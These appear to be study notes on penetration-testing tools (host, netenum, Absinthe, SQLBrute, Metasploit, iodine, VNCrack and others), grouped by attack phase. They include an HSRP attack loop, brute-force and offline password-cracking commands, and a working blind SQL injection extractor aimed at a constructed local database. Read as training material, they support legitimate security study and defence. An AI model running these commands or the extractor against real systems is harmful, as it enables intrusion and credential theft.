Enumeration
1.1.15 Host
Description: name is the domain name that is to be looked up. It can also be a dotted-decimal IPv4 address or a colon-delimited IPv6 address, in which case host will by default perform a reverse lookup for that address. server is an optional argument which is either the name or IP address of the name server that host should query instead of the server or servers listed in /etc/resolv.conf.
Usage:
    host [-aCdlnrTwv] [-c class] [-N ndots] [-R number] [-t type] [-W wait] [-4] [-6] [-s] {name} [server]
1.1.16 Itrace
Description: itrace is a traceroute program that traces paths through networks using ICMP Echo Request packets (rather than the UDP probes of classic traceroute). It can trace over IPv4 or IPv6. By default, the program will try to resolve the name given and choose the appropriate protocol automatically; if resolving a hostname returns both IPv4 and IPv6 addresses, it will use IPv4.
Notes: The benefit here is that the probing is disguised as ICMP echo, which is generally considered safe. A lot of network administrators keep ICMP available for troubleshooting purposes and it is rarely turned off. IP packets sent through a firewall with a spoofed address of a known trusted host can traverse the network using just ICMP, rendering the firewall useless against network mapping and enumeration attempts.
1.1.17 Netenum
Description: netenum can be used to produce lists of hosts for other programs. It is not as powerful as other ping-sweep tools, but it is simple. When given a timeout, it uses ICMP echo requests to find available hosts. If you do not supply a timeout, it just prints one IP address per line, so you can use them in shell scripts.
Notes: This produces a list of IP addresses in a given range. It takes the range as a single IP, an IP and netmask, or an IP in CIDR notation; it also takes hostnames. Use it to quickly produce address lists for a range and to feed them into scripts.
Usage:
    ./netenum 10.1.2.3/25
HSRP attack, feeding every address of a /23 to hsrp:
    for i in `netenum 192.168.20.11/23`; do ./hsrp -d ${i} -v 172.16.0.11 -a cisco -g 1 -I eth0; done
1.1.18 Netmask
Description: Netmask simply displays all the values of a netmask based on the input.
Notes: This is valuable for interpreting CIDR notation because it allows you to visually see the mask that gets applied to the IP address to compute the routing. I'll be using this program to buff up on my CIDR notation for sure.
Usage:
    ./netmask -d destination
    ./netmask -d 192.168.2.4/16
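The mask arithmetic that netmask displays and the host enumeration that netenum performs are the same few bit operations. The following is an added example, not code from either tool: it accepts the three target forms netenum takes (bare IP, IP/prefix, IP/dotted-mask), rejects a non-contiguous mask instead of silently accepting it, prints the mask in dotted, hex and binary form, and returns one usable host per entry so the list can be fed to a loop exactly as netenum's output is. The addresses used are the ones from the usage lines above; nothing is sent on the wire.

```python
import socket
import struct

# Added example reimplementing the mask arithmetic behind netmask(1) and the
# address listing behind netenum. Not code from either tool. Target specs are
# the forms netenum accepts: '10.1.2.3', '10.1.2.3/25', '10.1.2.3/255.255.255.128'.


def ip_to_int(ip: str) -> int:
    """Dotted-decimal IPv4 -> 32-bit integer (inet_aton validates the text)."""
    return struct.unpack("!I", socket.inet_aton(ip))[0]


def int_to_ip(n: int) -> str:
    return socket.inet_ntoa(struct.pack("!I", n))


def prefix_to_mask(prefix: int) -> int:
    """/prefix -> mask integer: `prefix` leading one bits, the rest zero."""
    if not 0 <= prefix <= 32:
        raise ValueError(f"bad prefix length /{prefix}")
    return (0xFFFFFFFF << (32 - prefix)) & 0xFFFFFFFF


def mask_to_prefix(mask: int) -> int:
    """Dotted mask -> prefix. A legal mask is a contiguous run of ones, so a
    mask such as 255.0.255.0 is rejected rather than silently becoming /16."""
    prefix = bin(mask).count("1")
    if prefix_to_mask(prefix) != mask:
        raise ValueError(f"non-contiguous netmask {int_to_ip(mask)}")
    return prefix


def parse_spec(spec: str) -> tuple:
    """Return (address, prefix). A bare address is treated as /32."""
    if "/" not in spec:
        return ip_to_int(spec), 32
    addr, suffix = spec.split("/", 1)
    prefix = mask_to_prefix(ip_to_int(suffix)) if "." in suffix else int(suffix)
    return ip_to_int(addr), prefix


def block(spec: str) -> tuple:
    """(network, broadcast, mask, prefix) of the block containing spec."""
    addr, prefix = parse_spec(spec)
    mask = prefix_to_mask(prefix)
    network = addr & mask                       # host bits cleared
    broadcast = network | (~mask & 0xFFFFFFFF)  # host bits set
    return network, broadcast, mask, prefix


def enumerate_hosts(spec: str) -> list:
    """One address per entry, as netenum prints without a timeout: the usable
    hosts of the block. /31 (RFC 3021 point-to-point) and /32 have no separate
    network/broadcast address, so every address in them is returned."""
    network, broadcast, _, prefix = block(spec)
    first, last = (network, broadcast) if prefix >= 31 else (network + 1, broadcast - 1)
    return [int_to_ip(n) for n in range(first, last + 1)]


def describe(spec: str) -> dict:
    """The values netmask shows: the mask in every notation, plus the network,
    broadcast and usable host count of the block."""
    network, broadcast, mask, prefix = block(spec)
    return {
        "prefix": prefix,
        "mask": int_to_ip(mask),
        "mask_hex": f"0x{mask:08x}",
        "mask_bin": ".".join(f"{(mask >> s) & 0xFF:08b}" for s in (24, 16, 8, 0)),
        "network": int_to_ip(network),
        "broadcast": int_to_ip(broadcast),
        "hosts": len(enumerate_hosts(spec)),
    }


if __name__ == "__main__":
    for key, value in describe("192.168.2.4/16").items():
        print(f"{key:>10}: {value}")
    # Same shape as `netenum 10.1.2.3/25`: one address per line for a shell loop.
    print("\n".join(enumerate_hosts("10.1.2.3/25")))
```

The binary column is the point of the netmask entry: for /16 it reads 11111111.11111111.00000000.00000000, and ANDing it with 192.168.2.4 gives the 192.168.0.0 network. The mask check matters when a target list comes from someone else's notes: a typo like /255.0.255.0 would otherwise enumerate the wrong block.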
1.1.19 Pirana
Network Mapping
1.2.4 Fping
Description: Unlike ping, fping is meant to be used in scripts, so its output is designed to be easy to parse. In the default mode, if a target replies, it is noted and removed from the list of targets to check; if a target does not respond within a certain time limit and/or retry limit it is designated as unreachable. fping also supports sending a specified number of pings to a target, or looping indefinitely (as in ping).
Notes: It's always a good idea to have a program that allows for multiple inputs and easy output for parsing. fping works just like regular ping, only it can be used in scripts and loops. Good shit.
Usage:
    fping 192.168.2.4 192.168.2.5 192.168.4.66
Vulnerability Identification
1.3.1 Absinthe
Description: GUI based tool designed to automate the process of blind SQL injection. It works by profiling response pages as true or false from known cases, then moves on to classify unknown responses as true or false.
Notes: Logical (boolean-based) blind SQL injection attacks. GUI application; see the documentation: http://www.0x90.org/releases/absinthe/docs/basicusage.php
1.3.2 Bed
Description: Bruteforce Exploit Detector (BED) is a suite of scripts that automatically tests implementations of different protocols for buffer overflows and format string vulnerabilities by bombarding the server with random strings of varying length.
Notes: Basically a remote exploit fuzzer with no real logic behind its "user"-supplied data.
1.3.3 CIRT Fuzzer
Description: TCP/UDP fuzzer.
1.3.4 Cisco Auditing Tool
Description: Auditor for Cisco network devices (IOS devices).
Notes: Useful for password guessing, brute forcing, dictionary attacks and scanning multiple hosts. Even has a quiet mode option.
1.3.5 Cisco Enable Bruteforcer
Description: Brute force tool that attempts unbridled access to an IOS device.
Notes: Brute force attack tool for Cisco devices.
Usage:
    enabler <ip> [-u user] <pass> <passlist> [port]
1.3.27 Mibble MIB Browser
Description: Mibble is an open-source SNMP MIB parser (or SMI parser) written in Java. It can be used to read SNMP MIB files as well as simple ASN.1 files.
1.3.28 Mistress
Description: Mistress is an 'Application Sadism Environment' and can also be called a fuzzer. It is written in Python and was created for probing file formats on the fly and protocols with malformed data, based on pre-defined patterns. It is recommended that the project site be visited for further documentation and use cases.
1.3.29 Nikto
Description: Nikto is an Open Source (GPL) web server scanner which performs comprehensive tests against web servers for multiple items.
1.3.30 OAT
Description: OAT (Oracle Auditing Tools) is a set of tools which can be used to audit Oracle databases running on the Microsoft Windows platform.
1.3.31 Onesixtyone
Description: SNMP scanner.
1.3.32 OpenSSL-Scanner
Description: OpenSSL vulnerability scanner; checks hosts for the KEY_ARG overflow in OpenSSL 0.9.6d and older.
Notes: Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner and a detailed vulnerability analysis. Only Linux/x86 targets are supported.
1.3.33 Paros Proxy
Description: Java-developed web proxy.
1.3.34 Peach
Description: Python-based cross-platform application fuzzer.
Notes: Very versatile fuzzer. See the documentation: http://peachfuzz.sourceforge.net/docs/tutorial/peach-tutorial.htm
1.3.35 RPCDump
Description: RPCDUMP is a program which provides console access to the RPC APIs in Windows.
1.3.36 RevHosts
Description: Python-based tool to accelerate passive information gathering. Modules:
• vhh: uses search engines to return the hosts that share an IP (virtual host hacking).
• Findsubdomains: module that returns the subdomains of a domain.
• Dnsbruteforce: now a module of revhosts. It is multithreaded (one thread per DNS server) and resolves hostnames of a domain.
• Getdirectories: looks on search engines for directories that exist on a host (no connection to the host).
• subnet: looks for IPs that have the same technical contact.
• getmail: module that searches the internet for e-mail addresses.
Notes: See the documentation: http://www.revhosts.net
1.3.37 SMB Bruteforcer
Description: An SMB brute forcer which tries approx. 1200 logins/sec on Windows 2000 because of the timeout bug.
Notes: Useful for legacy machine penetration attempts.
1.3.38 SMB Client
Description: A LanManager-like simple client for Unix. The Samba software suite is a collection of programs that implements the SMB protocol for Unix systems, allowing you to serve files and printers to Windows, NT, OS/2 and DOS clients.
Notes: Absolutely necessary when testing or infiltrating a primarily Windows-based network.
1.3.39 SMB Serverscan
Description: Scans for machines running Samba servers.
Notes: Absolutely necessary when testing or infiltrating a primarily Windows-based network.
1.3.40 SMB-NAT
Description: NetBIOS Auditing Tool. This tool can perform various security checks on remote servers running NetBIOS file sharing services. It is capable of enumerating shares and making break-in attempts using a (user-provided) list of users and passwords.
Notes: Absolutely necessary when testing or infiltrating a primarily Windows-based network.
1.3.41 SMBdumpusers
Description: NetBIOS Auditing Tool to dump the users of remote Windows hosts.
Notes: Absolutely necessary when testing or infiltrating a primarily Windows-based network.
1.3.42 SMBgetserverinfo
Description: NetBIOS Auditing Tool to retrieve server-side information about a Windows host.
Notes: Absolutely necessary when testing or infiltrating a primarily Windows-based network.
1.3.48 SQLbrute
Description: SQLBrute is a tool for brute forcing data out of databases using blind SQL injection vulnerabilities. It supports time-based and error-based exploitation on Microsoft SQL Server, and error-based exploitation on Oracle.
Notes: Very loud and will easily be identified by most IDS systems.
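Absinthe (1.3.1) and SQLBrute both automate the same idea: when the application leaks nothing but a true/false signal (a profile page renders or it does not), the attacker asks yes/no questions about one character at a time and bisects. The block below is an added example, not code from either tool: it builds a throwaway in-process SQLite "application" with a made-up users table and secret, exposes the vulnerable string-concatenated lookup next to its parameterised fix, profiles the oracle with known true and false cases the way Absinthe does first, then extracts the admin's secret by binary search on length and on each character's code point. SQLite's unicode()/substr() stand in for ASCII()/SUBSTRING() on MSSQL; SQLBrute's time-based mode replaces the page signal with a measurable delay and otherwise runs the same search.

```python
import sqlite3

# Added example (not Absinthe's or SQLBrute's own code): boolean-based blind SQL
# injection against a constructed in-process SQLite application, beside the
# parameterised query that closes the hole. Table, rows and secret are made up.


def build_db() -> sqlite3.Connection:
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, name TEXT, secret TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "admin", "S3cr3t!"), (2, "bob", "hunter2")])
    return con


def profile_exists_vulnerable(con: sqlite3.Connection, user_id: str) -> bool:
    """The only signal the attacker gets: does a profile render or not.
    The id is concatenated straight into the query (the bug)."""
    sql = "SELECT id FROM users WHERE id = " + user_id
    try:
        return con.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False  # an error page profiles as "false"


def profile_exists_safe(con: sqlite3.Connection, user_id: str) -> bool:
    """Hardened version: validate the type, then bind the value as a parameter
    so the database never parses attacker text as SQL."""
    try:
        uid = int(user_id)
    except ValueError:
        return False
    return con.execute("SELECT id FROM users WHERE id = ?", (uid,)).fetchone() is not None


class BlindExtractor:
    """Pulls a string out of the database using only the true/false signal."""

    def __init__(self, oracle, base: str = "1"):
        self.oracle, self.base, self.queries = oracle, base, 0
        # Profiling step: confirm that a known-true and a known-false condition
        # really produce distinguishable responses before trusting the oracle.
        if not (self.ask("1=1") and not self.ask("1=2")):
            raise RuntimeError("oracle does not distinguish true from false")

    def ask(self, condition: str) -> bool:
        self.queries += 1
        return self.oracle(f"{self.base} AND ({condition})")

    @staticmethod
    def _bisect(greater_than, lo: int, hi: int) -> int:
        """Find value v in [lo, hi] given an oracle for 'v > mid':
        ceil(log2(hi - lo)) questions instead of one per candidate."""
        while lo < hi:
            mid = (lo + hi) // 2
            if greater_than(mid):
                lo = mid + 1
            else:
                hi = mid
        return lo

    def extract(self, subquery: str, max_len: int = 64) -> str:
        length = self._bisect(lambda m: self.ask(f"length(({subquery})) > {m}"), 0, max_len)
        chars = []
        for pos in range(1, length + 1):
            # printable ASCII 32..126; unicode()/substr() are the SQLite spellings
            code = self._bisect(
                lambda m, p=pos: self.ask(f"unicode(substr(({subquery}),{p},1)) > {m}"),
                32, 126)
            chars.append(chr(code))
        return "".join(chars)


def demo() -> dict:
    con = build_db()
    attacker = BlindExtractor(lambda payload: profile_exists_vulnerable(con, payload))
    secret = attacker.extract("SELECT secret FROM users WHERE name = 'admin'")
    # The same injected payload against the hardened endpoint is rejected outright.
    safe_blocks = profile_exists_safe(con, "1 AND (1=1)") is False
    return {"secret": secret, "queries": attacker.queries, "safe_blocks_injection": safe_blocks}


if __name__ == "__main__":
    print(demo())
```

Seven printable characters cost roughly seven requests each plus a handful for the length, which is why the SQLBrute note above calls the technique loud: the IDS sees dozens of near-identical requests whose only variation is a comparison constant, and every one of them carries length(, substr( or ASCII( in a parameter that should have been an integer. On the defensive side, the int() check alone would have stopped this instance, but the bound parameter is what stops the general case.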
1.3.50 Smb4K
Description: Smb4K is an SMB/CIFS share browser for KDE. It uses the Samba software suite to access the SMB/CIFS shares of the local network neighbourhood.
1.3.52 Snmp Enum
Description: Perl script to enumerate information on machines running SNMP.
1.3.53 Spike
Description: Linux-based network protocol analysis tool. See http://www.immunitysec.com/resources-freesoftware.shtml
1.3.55 SuperScan
Description: Powerful TCP port scanner, pinger and resolver. SuperScan is a powerful connect-based TCP port scanner, pinger and hostname resolver.
Notes: Multithreaded and asynchronous techniques make this program extremely fast and versatile.
1.3.59 Wapiti
Description: Wapiti allows you to audit the security of your web applications. It performs "black-box" scans, i.e. it does not study the source code of the application but scans the web pages of the deployed webapp, looking for scripts and forms where it can inject data. Once it has this list, Wapiti acts like a fuzzer, injecting payloads to see whether a script is vulnerable.
Penetration
Framework3-MsfC
Description: The Metasploit Framework is an open-source platform for developing, testing and using exploit code.
Notes: Don't leave home without it.
1.4.2 Framework3-MsfUpdate
Description: Metasploit utility to update Metasploit using SVN.
1.4.3 Framework3-Msfcli
Description: Metasploit command line interface.
Notes: Quickest interface to use.
1.4.4 Framework3-Msfweb
Description: Metasploit interactive webserver and interface.
1.4.5 Init Pgsql (autopwn)
Description: Metasploit autopwn engine.
Notes: Cycles through every potential Metasploit exploit in an attempt to compromise the host.
1.4.6 Milw0rm Archive
Description: An archive of exploit code from Milw0rm.com.
Notes: Useful for obtaining PoC code. http://www.milw0rm.com
1.4.7 MsfCli
Description: Metasploit command line interface.
1.4.8 MsfConsole
Description: The msfconsole interactive command-line interface provides a command set that allows the user to manipulate the framework environment, set exploit options, and ultimately deploy the exploit. Unrecognized commands are passed to the underlying operating system; in this way, a user can run reconnaissance tools without having to leave the console.
1.4.9 MsfUpdate
Description: Uses SVN to update Metasploit code and exploits.
1.4.11 OpenSSL-To-Open
Description: openssl-too-open is a remote exploit for the KEY_ARG overflow in OpenSSL 0.9.6d and older. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner and a detailed vulnerability analysis. Only Linux/x86 targets are supported.
Privilege Escalation
1.5.7 Driftnet
Description: Driftnet is a program which listens to network traffic and picks out images from the TCP streams it observes.
Notes: Useful for sniffing out image files of other users on the network; can also be used to hijack social networking pages/profiles.
1.5.25 Medusa
Description: Medusa is a speedy, massively parallel, modular login brute-forcer for network services, created by the geeks at Foofus.net.
Notes: It currently has modules for the following services: CVS, FTP, HTTP, IMAP, MS-SQL, MySQL, NCP (NetWare), PcAnywhere, POP3, PostgreSQL, rexec, rlogin, rsh, SMB, SMTP (VRFY), SNMP, SSHv2, SVN, Telnet, VmAuthd, VNC, and a generic wrapper module.
1.5.26 Msgsnarf
Description: Passively monitors a network for interesting data being sent across it. Msgsnarf captures messages on a network/interface.
1.5.27 Nemesis Spoofer
Description: Nemesis is a packet-crafting program that can forge raw packets from the Ethernet layer up and put them on the wire. It's handy for when you just want to sit down and specify exactly what packets you want to craft. It supports crafting ARP, DNS, Ethernet, ICMP, IGMP, IP, RIP, TCP, and UDP packets. Similar in concept to the "hping" program.
1.5.28 NetSed
1.5.29 Netenum
1.5.30 Netmask
1.5.40 TcPick
Description: A TCP stream sniffer and connection tracker. Tcpick is able to save the captured flows in different files or display them in the terminal, so it is useful to sniff files transmitted via FTP or HTTP. It can display the whole stream on the terminal when the connection is closed, in different display modes such as hexdump, hexdump + ASCII, printable characters only, raw mode and so on.
Usage:
    tcpick -i eth0 "port 80" -wRub
    (log HTTP data in unique files, client and server mixed together)
    tcpick -i eth0 -C -bCU -T1 "port 25"
    (display client data only of the first SMTP connection)
1.5.41 URLsnarf
1.5.42 VNCrack (passwd)
Description: An extremely loud brute force tool to be used on servers or password files.
Notes: Brute force the hell out of a server. Additionally, you may pass a registry key with the encrypted password or the UNIX password file to VNCrack and it does the simple fixed-key decryption for you.
Usage:
    vncrack -h target.host.com -w wordlist.txt [options]
    (to crack an online host)
    vncrack -C /home/some/user/.vnc/passwd
    (to crack a password file offline)
1.5.43 WebCrack
1.5.44 Wireshark
Description: GUI-based network traffic analyzer.
Notes: Best free graphical traffic analyzer there is. Don't leave home without it. See the documentation: www.wireshark.org
1.5.45 Wireshark Wifi
Description: Wireshark with the WiFi injection patch allows the user to select a packet opened in Wireshark, edit it and reinject it through the LORCON injection library.
1.5.46 WyD
Description: wyd is a password profiling tool that extracts words/strings from supplied files and directories.
Notes: It supports different file types: plain, html, php (partially), doc, ppt, mp3, pdf, jpeg, odp/ods/odp, and extracting raw strings.
Maintaining Access
1.6.2 Backdoors
1.6.3 CryptCat
Description: Cryptcat is the standard netcat enhanced with Twofish encryption, with ports for Windows NT, BSD and Linux. Twofish is courtesy of Counterpane and Cryptix.
Notes: Netcat with encryption functionality built in.
1.6.4 HttpTunnel Client
1.6.5 HttpTunnel Server
1.6.6 ICMPTX
1.6.7 Iodine
Description: This is a piece of software that lets you tunnel IPv4 data through a DNS server.
Notes: Useful in situations where internet access is firewalled and therefore limited, but DNS queries are allowed (as usual).
Usage:
    iodine [-v] [-h] [-f] [-u user] [-t chrootdir] [-d device] [nameserver] topdomain
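What "tunnel IPv4 data through a DNS server" means in practice is that each outbound packet becomes the labels of a query name under the topdomain, the victim's own recursive resolver forwards it, and the host authoritative for that domain reassembles it. The block below is an added example and not iodine's code or wire format: it shows the framing constraints any such tunnel has to respect (63-octet labels, 253-character names, case-insensitive names, so base32 rather than base64), a sequence label so frames can be reordered, and the server-side reassembly. The topdomain t.example.com and the 512-byte "packet" are constructed for the demonstration; nothing is resolved.

```python
import base64

# Added example, not iodine's own code or wire format: how a frame is carried
# upstream in DNS query names within the limits resolvers enforce, and how the
# authoritative server for the tunnel domain puts it back together.

MAX_LABEL = 63               # RFC 1035: a label is at most 63 octets
MAX_NAME = 253               # a full name is at most 253 characters in text form
SEQ_WIDTH = 4                # sequence label "s0000".."s9999" keeps frames ordered
TOPDOMAIN = "t.example.com"  # assumed tunnel domain for the demonstration


def encode_chunk(data: bytes) -> str:
    """Base32, lowercased, padding stripped. DNS names are case-insensitive and
    '=' is not a valid label character, so base64 would not survive resolvers."""
    return base64.b32encode(data).decode("ascii").rstrip("=").lower()


def decode_chunk(text: str) -> bytes:
    pad = (-len(text)) % 8  # restore the padding the encoder stripped
    return base64.b32decode(text.upper() + "=" * pad)


def bytes_per_query(topdomain: str) -> int:
    """Largest payload whose name still fits: whole 63-char labels, each costing
    64 with its dot, after the sequence label and the topdomain are paid for."""
    fixed = 1 + SEQ_WIDTH + 1 + len(topdomain)   # "sNNNN." + topdomain
    labels = (MAX_NAME - fixed) // (MAX_LABEL + 1)
    chars = labels * MAX_LABEL
    return (chars * 5 // 8) // 5 * 5              # whole 5-byte base32 groups


def upstream_queries(data: bytes, topdomain: str = TOPDOMAIN) -> list:
    """Client side: split a frame into query names to send via the local
    resolver. Every name is checked against the DNS limits before use."""
    step = bytes_per_query(topdomain)
    names = []
    for seq, pos in enumerate(range(0, len(data), step)):
        text = encode_chunk(data[pos:pos + step])
        labels = [text[i:i + MAX_LABEL] for i in range(0, len(text), MAX_LABEL)]
        name = ".".join([f"s{seq:0{SEQ_WIDTH}d}", *labels, topdomain])
        if len(name) > MAX_NAME or any(len(l) > MAX_LABEL for l in name.split(".")):
            raise ValueError(f"name exceeds DNS limits: {name}")
        names.append(name)
    return names


def reassemble(names, topdomain: str = TOPDOMAIN) -> bytes:
    """Server side: strip the topdomain, order by sequence label, decode."""
    suffix = "." + topdomain
    frames = {}
    for name in names:
        if not name.lower().endswith(suffix):
            raise ValueError(f"not under the tunnel domain: {name}")
        labels = name[:-len(suffix)].split(".")
        seq_label, payload = labels[0], "".join(labels[1:])
        if not (seq_label.startswith("s") and seq_label[1:].isdigit()):
            raise ValueError(f"missing sequence label: {name}")
        frames[int(seq_label[1:])] = decode_chunk(payload)
    return b"".join(frames[k] for k in sorted(frames))


if __name__ == "__main__":
    packet = bytes(range(256)) * 2   # constructed stand-in for an IPv4 packet
    for q in upstream_queries(packet):
        print(len(q), q)
    assert reassemble(upstream_queries(packet)) == packet
```

With a 13-character topdomain each query carries 115 bytes, so a 512-byte packet costs five lookups upstream; the reply direction rides in the answer records of the response, which is why iodine wants the record type chosen to suit the resolver in between. The same arithmetic is what a defender looks for: a burst of 200-character names, all under one domain, all high-entropy, passing through a resolver that the firewall trusts. Restricting egress to the corporate resolver does not stop this, since the tunnel is built to go through it.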
1.6.9 Privoxy
Description: Privoxy is a web proxy with advanced filtering capabilities for protecting privacy, modifying web page data, managing cookies, controlling access, and removing ads, banners, pop-ups and other obnoxious Internet junk.
Notes: Privoxy has a very flexible configuration and can be customized to suit individual needs and tastes. Privoxy has applications for both stand-alone systems and multi-user networks.
1.6.10 ProxyTunnel
Description: ProxyTunnel is a program that connects stdin and stdout to a server somewhere on the network, through a standard HTTPS proxy.
Notes: Uses include tunnelling SSH sessions through HTTP(S) proxies, allowing activity that would otherwise be restricted.
1.6.11 Rinetd
1.6.14 socat
Description: socat is a relay for bidirectional data transfer between two independent data channels. Each of these data channels may be a file, pipe, device (serial line etc. or a pseudo terminal), a socket (UNIX, IP4, IP6 - raw, UDP, TCP), an SSL socket, a proxy CONNECT connection, a file descriptor (stdin etc.), the GNU line editor (readline), a program, or a combination of two of these. These modes include generation of "listening" sockets, named pipes, and pseudo terminals.
Covering Tracks
1.7.1 Housekeeping
1.8.1.19 Kismet
Description: Kismet is an 802.11 layer-2 wireless network detector, sniffer, and intrusion detection system.
Notes: Kismet will work with any wireless card which supports raw monitoring (rfmon) mode, and can sniff 802.11b, 802.11a, and 802.11g traffic. Kismet identifies networks by passively collecting packets and detecting standard named networks, detecting (and given time, decloaking) hidden networks, and inferring the presence of non-beaconing networks via data traffic.
1.8.1.20 Load IPW3945
1.8.1.21 Load acx100
1.8.1.22 MDK2
1.8.1.23 MDK2 for Broadcom
A GNU/Linux utility for viewing/manipulating the MAC address of network
1.8.1.24 MacChanger interfaces
1.8.1.25 Unload Drivers
1.8.1.26 Wep_crack
1.8.1.27 Wep_decrypt
1.8.1.28 WifiTap
Description: Wifitap is a proof of concept for communication over WLAN networks using traffic injection.
Notes: Wifitap allows direct communication with a station associated to a given access point, without being associated ourselves or being handled by the access point.
Digital Forensics
1.10.12 Sleuthkit
Description: The Sleuth Kit (TSK) is a collection of UNIX-based command line tools that allow you to investigate a computer.
Notes: The current focus of the tools is the file and volume systems, and TSK supports FAT, Ext2/3, NTFS, UFS, and ISO 9660 file systems.
1.10.13 Vinetto
Description: Vinetto is a forensics tool to examine Thumbs.db files.
Reverse Engineering
1.11.1 GDB Console GUI
Description: Console debugger to step through instructions and locate breakpoints in executables.
Notes: Standard *nix console debugger. Don't leave home without it.
1.11.2 GDB GNU Debugger
Description: GUI debugger, works the same as GDB.
Notes: Don't leave home without it.
1.11.3 GDB Server
Description: gdbserver is a control program for Unix-like systems, which allows you to connect your program with a remote GDB via target remote, but without linking in the usual debugging stub.
1.11.4 GNU DDD
Description: GNU DDD is a graphical front-end for command-line debuggers. Besides "usual" front-end features such as viewing source texts, DDD has become famous through its interactive graphical data display, where data structures are displayed as graphs.
1.11.5 Hexdump
Description: Hexdump is a simple program for dumping binary files in hexadecimal format. It provides both hexadecimal and ASCII columns.
1.11.6 Hexedit
Description: View and edit files in hexadecimal or in ASCII. The file can be a device, as the file is read a piece at a time. You can modify the file and search through it.
1.11.7 OllyDBG
Description: 32-bit assembler-level debugger and disassembler for Win32 platforms.
Notes: Don't leave home without it.